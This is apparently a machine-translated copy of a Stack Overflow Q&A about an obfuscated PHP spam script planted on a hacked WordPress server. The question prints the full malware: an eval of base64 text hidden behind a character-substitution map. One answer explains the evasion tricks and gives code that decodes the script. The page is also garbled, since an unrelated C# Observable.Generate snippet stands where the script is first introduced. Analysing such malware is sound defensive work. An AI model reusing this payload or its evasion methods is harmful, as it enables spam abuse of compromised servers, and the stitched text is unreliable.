PHP脚本发送垃圾邮件

时间:2016-09-30 17:50:47

标签: php wordpress security obfuscation spam

我正在我的ubuntu服务器上运行wordpress。最近,我发现它被黑客攻击并从我的服务器发送大量垃圾邮件。我在wordpress目录中找到了以下奇怪的脚本。有谁知道它在做什么?以及如何扭转混淆并查看原始代码?

Observable.Generate (
  new Foo(),
  item => true, // in your example, this never terminates
  item => item, // we don't actually do any state transitions
  item => { return item.DoIt(); }  // This is where we emit our value
  );

我终于得到了解码后的脚本如下。但是有一行有语法错误。还有一个尚未定义的函数“send_data1”。我想知道这个脚本是如何工作的

<?php
 $fodhaow = 2570; function iytpmqplaf($jtsqp, $paicjek){$nuodxnxumv = ''; for($i=0; $i < strlen($jtsqp); $i++){$nuodxnxumv .= isset($paicjek[$jtsqp[$i]]) ? $paicjek[$jtsqp[$i]] : $jtsqp[$i];}
$itbenabk="base" . "64_decode";return $itbenabk($nuodxnxumv);}
$uhzwglv = 'RrqBxzCyDeRfd1aNuGc58eqMDedPlGdydPmm2Q5vAEcNl0qMu1zi2A75l17MD'.
'edPlGdydPmm2Q5vAEcqu9dguqCPDecgu9aNl0ufoAE3pRNhu1zieGaNlwzMlrqXxeRfoAE3pRN'.
'hxw7BlGdqeGzyDedM8wdgu9RfoZE3pRNhxwFNeGvq7AV9lwHne1znDwvI7rqglqCixwIqd'.
'Pmm2Q5vAVi2D0CPDwHLxAhfdHCpQiCbZYYV8eoVdrqiDwiNpRN3pRfVTAhVxw8V2Aa'.
'N7rzXTAUCTAdEDp7EoQumoPiF8QTibQRyvLTX6poFv4IqDwRioQc46pHEvQV42Ri2TAhVTAhVTAcqKrqi2AE3pRNCpRfvA4aE8e'.
'aSTpiVD0q5DzC9DeaM81CB7rzB7tofdGcfupfgb1qButzidPE3pRfEDrHi8ZhCTtvmlrqi2ATCT4mEDrHi8ZmP2Q5vAVi2drT1'.
'vHCEDwvgDrzMDrHi8ZhCTrdSu1Y1vHCEDwvgDrYf7ed5DrzLl1aq2AaE8ea'.
'SwyH72ZE3pRfvA4ayDwFEe1aS7rUVsZcIl9vqu0qSlrqkDZSEDwvPKeci2Aa4vLaMDrzLl1a'.
'qe1aS7rUN2Q5vAVi2dtdquGz57AhCTtvql0aMDrHi8QUV2AayDwFEe1aS7rUN6mi2pRNND4hfTZaPDe'.
'vIltRNpRN3pRfVTAhVdtdquGz57AhCTtvql0aMDrHi8QTfdtvql0aMDrHi8ZE3pRNCpRfvA0zLxrJVd'.
'tdquGz57p5vAVi2D9zB8GaNl1nVDrzLu9qm7AVEDrHi8ZEvA95vA4hV'.
'TAhElGzie1aS7rUVsZh4TL5vA4hVTAhEx1zFTpiVdHCQazdwazdldiSYzHcMZUCQzA77TAnVdHCQazdwazdldIdH'.
'YzzHYIaMzzdddIi3pRfVTAhVdrXqKzC5DwnVsZcy7td5DwnfdrXqKZE3pRfVpRfVTAhVD0CPTAVExQim'.
'6PhExZhJTtviu0Oql4VEx1zF2Q5VdrEW2PEvA4hVTAc3pRfVTAhVTAhVTAaWDeql'.
'drq7TpiV81SP2rCPDAVEx1zFwPaNeZEVe4hfdrXqKzC5DwnVdZhPvQYN2Q5vA4hVTAcCpRfvA4hVTAc0lGTV2AaNs'.
'Qh3TAaNstviu0Oql4VEDrHi8ZE32Ri2TAhVTt5vA4hVTAhVTAhVD0CPTAVExLi'.
'm6PhExLOy7td5DwnfdrXqKZEVd48VdrEJuGaPlrzB2AaE8eaS2Q5VdrfW2PmVdrEW2PE'.
'vA4hVTAhVTAhVKmi2TAhVTAhVTAhVTAhVdrCI7HCE8eaSTAnCTrvfu4Sgu0RfdraS7'.
'rHldrq72ZcKTrCPDAVEx1zFwPajeZEN6mi2TAhVTAhVTAcCpRfVTAhVMRi2pRfVTAhVu0zi7edBTAag7eaMDrHi8Q5vA9ivAV'.
'i2D9zB8GaNl1nVu1zBDHCE8eaSoZVEDrHi8ZEvA95vA4hVTAhExrzSDAhCTAT46m'.
'i2pRfVTAhVD0CPDwHLxAVEDrHi8z54xrzSDrzPuPd7TrHyTAaWDeECs4a18wOIDZEvA4hVTAc'.
'3pRfVTAhVTAhVTAafDwHETAnCTAaWDeEVb4h464h4TAnVdtDSltz'.
'qTAnVTqOPern46mi2TAhVTtivAVi2TAhVTAam8edSleoVsZcSu9dSKZV9xtaiuAuVsQn'.
'V8edP8eEfpRfVTAhVTAhVTA7XDeafl1R9Tpi+TAaE8eaSwPdXDeafl1R4eZmvA4hVTAhVTAhVd1Sq'.
'8waqu4uVsQnVdrSq8wR5pRfVTAhVTAhVTA7Ll1FiDwFidPhCs4hEDrHi8'.
'z5480CEKZd7bhi2TAhVTAhVTAh97rqXDwCI7AuVsQnVdraS7rHlT9aNlwzg7eR4eZmvA4hVTAhVTAhVpRfVTAh'.
'V2ZE3pRfvA4hVTAhE8GanTpiVuGaPDwHXe1vgl9aqKtaM8Gdq8eaq2Aam8edSleoN6mi2TAhVThi2TAh'.
'VTAaPDevIltRVsZchD0q5DzC9DeaM81CB7rzB7tofdraS7rHlT9zPlAd7bAcrRYOQaZmVdrviKAE3pRfvA4hVTAcND4hfdrSi'.
'7tcMu0zyurCBu1zMxrzSDrzP2Ri2TAhVTt5vA4hVTAhVTAhVxw8V2tviu9cguPVExtaiuHCPDevml1FyDzCfDw'.
'HEDedloHi5TATPoph42ZhCsQiVaEHoYiYNpRfVTAhVTAhVTt5vA4hVTAhVTAhVTAhVTAaPDevIltRVsZh4ZHaYYHCHYqdsYqO'.
'iT4hBTAaf7tameGdquGcgl9vqe1Sq8waquq5meQ5vA4hVTAhVTAhVMRi2TAhVTtivA4hVTAcq'.
'ltvqpRfVTAhVKmi2TAhVTAhVTAhEu0zy7wOiTpiVTEvsQEFHRIadQiFMazdZQIT46mi2TAhVTtivAVi2TAhV'.
'Ttdq7tzPl4hEu0zy7wOi6mi2MRi2pRN07wFL7rqgl4cyDwFEe1aS7rUP2AaE8'.
'eaS2Ri2Kmi2TAhVTAJgTtzyDZcyl1vWDeaypRNC';
$tedsroi = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
eval/*o*/(iytpmqplaf($uhzwglv, $tedsroi));?>

2 个答案:

答案 0 :(得分:3)

好的老脚本kiddy喜欢base64的东西。

以下是:

首先有一个eval(),它将字符串计算为PHP代码。为避免在代码库中找到eval(个字符串,请添加/*0*/注释。函数iytpmqplaf()提供要执行的PHP代码。

其次,这个变量$itbenabk包含&#34; base64_decode&#34;。同样,为了避免在代码库中找到base64_encode个字符串,字符串从两个字符串连接起来。

第三次,调用$itbenabk变量。 PHP意识到$itbenabk包含现有函数的字符串名称,即base64_decode(),因此调用它。 $uhzwglv中的字符串包含实际的PHP代码。

实际的base64字符串也被一个简单的char到char映射稍微修改了一下。要查看实际代码,您可以执行以下操作:

$char2char = Array('1'=>'2', '0'=>'m', '3'=>'7', '2'=>'K', '5'=>'s', '4'=>'i', '7'=>'d', '6'=>'O', '9'=>'n', '8'=>'Y', 'A'=>'C', 'C'=>'9', 'B'=>'u', 'E'=>'k', 'D'=>'Z', 'G'=>'3', 'F'=>'5', 'I'=>'1', 'H'=>'F', 'K'=>'e', 'J'=>'8', 'M'=>'f', 'L'=>'j', 'O'=>'x', 'N'=>'p', 'Q'=>'T', 'P'=>'y', 'S'=>'h', 'R'=>'Q', 'U'=>'E', 'T'=>'I', 'W'=>'r', 'V'=>'g', 'Y'=>'U', 'X'=>'t', 'Z'=>'S', 'a'=>'R', 'c'=>'B', 'b'=>'L', 'e'=>'X', 'd'=>'J', 'g'=>'v', 'f'=>'o', 'i'=>'0', 'h'=>'A', 'k'=>'6', 'j'=>'q', 'm'=>'w', 'l'=>'b', 'o'=>'M', 'n'=>'4', 'q'=>'l', 'p'=>'D', 's'=>'P', 'r'=>'G', 'u'=>'c', 't'=>'H', 'w'=>'W', 'v'=>'N', 'y'=>'z', 'x'=>'a', 'z'=>'V');
$b64code = ''; 
for($i=0; $i < strlen($uhzwglv); $i++){
    $b64code .= isset($char2char[$uhzwglv[$i]]) 
                   ? $char2char[$uhzwglv[$i]] : $uhzwglv[$i];
} 
echo base64_decode($b64code);

答案 1 :(得分:3)

您可以对代码进行取消混淆,但这并不重要。您应该更关心发现和解决安全问题。

最好的办法是仔细关注FAQ My site was hacked - WordPress Codex.

然后查看Hardening WordPress - WordPress CodexBrute Force Attacks - WordPress Codex

中建议的安全措施